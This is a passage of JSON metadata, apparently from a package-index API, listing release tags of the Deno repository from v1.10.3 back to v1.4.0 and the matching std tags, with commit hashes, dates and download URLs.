and%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":nul